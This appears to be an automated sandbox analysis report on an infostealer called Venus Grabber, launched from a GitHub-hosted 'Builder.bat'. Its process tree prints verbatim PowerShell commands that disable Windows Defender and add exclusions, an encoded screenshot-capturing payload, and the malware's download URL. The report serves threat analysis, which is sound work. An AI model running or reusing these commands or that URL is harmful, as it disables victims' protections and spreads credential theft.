Analysis
-
max time kernel
33s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
11-05-2024 12:47
General
-
Target
https://github.com/hinmis/Venus_Grabber/raw/main/Venus%20Grabber/Builder.bat
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 17 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 56 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Kills process with taskkill 24 IoCs
-
Modifies registry class 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 39 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 28 IoCs
-
Suspicious use of SendNotifyMessage 28 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/hinmis/Venus_Grabber/raw/main/Venus%20Grabber/Builder.bat1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --field-trial-handle=4156,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4760 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --field-trial-handle=1428,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --field-trial-handle=4988,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5244 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5260,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5268,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=5884,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=5140,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6304 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5856,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6388 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5156,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6820,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:81⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f4 0x41c1⤵
-
C:\Users\Admin\Downloads\Builder.bat"C:\Users\Admin\Downloads\Builder.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BUILDER.BAT" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE"C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE"C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\BUILDER.EXE"5⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\snd2hzzt\snd2hzzt.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CE9.tmp" "c:\Users\Admin\AppData\Local\Temp\snd2hzzt\CSC5138A22A535410B9374FA97E9DD6D0.TMP"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4672"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46725⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4672"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46725⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1924"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19245⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3088"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30885⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1924"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19245⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3088"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30885⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20925⤵
- Kills process with taskkill
-
